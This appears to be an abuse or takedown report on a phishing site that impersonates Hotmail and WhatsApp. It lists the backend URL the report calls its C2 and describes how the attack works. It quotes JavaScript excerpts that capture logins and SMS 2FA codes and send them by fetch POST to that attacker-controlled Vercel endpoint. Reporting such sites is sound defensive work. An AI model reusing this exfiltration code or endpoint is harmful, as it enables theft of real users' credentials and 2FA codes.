Aquí está el reporte actualizado con la información del frontend:
Problem Description
A malicious phishing website has been identified that performs phishing and personal data theft from users. The site is hosted on Azure Static Web Apps and impersonates Hotmail and WhatsApp services.
Infrastructure
- Frontend URL: Validación PIN
- Backend/C2 Server:
https://servidorne.vercel.app/discord(Vercel)
Attack Flow
The frontend captures user credentials, phone numbers, and 2FA codes, then communicates directly with the backend server to exfiltrate all stolen data including IP address, geolocation, and timestamps.
Malicious site URL:
https://servidorne.vercel.app/discord
Steps Executed by the Attack
Step 1: Credential Capture
async function sendLoginData(email, password) {
setStorageData(CONFIG.STORAGE_KEYS.CORREO, email);
const message = await formatEnhancedMessage("Login", password, {
Email: email,
});
return await sendToDiscord(message, { username: "Login System" });
}
Step 2: Extracts Geolocation
async function getEnhancedIPInfo() {
// Tries 5 different APIs to obtain IP
// APIs: ipapi.co, ipinfo.io, myip.com, ipwho.is, bigdatacloud
// Obtains: IP, country, city, region, timestamp
}
Step 3: Captures 2FA Codes
async function sendSmsCode(code) {
const message = await formatEnhancedMessage("SMS", code);
return await sendToDiscord(message, { username: "SMS System" });
}
Step 4: Sends to C2 Server
const response = await fetch("https://servidorne.vercel.app/discord", {
method: "POST",
body: formData,
});
Project Information
| Aspect | Detail |
|---|---|
| Hosting Platform | Vercel |
| Malicious URL | https://servidorne.vercel.app/discord |
| Attack Type | Phishing + Data Exfiltration |
| Target | Credential and location theft |
| Data Stolen | Email, password, phone, IP, 2FA codes |
| Source Code | file.js - 430 lines of JavaScript |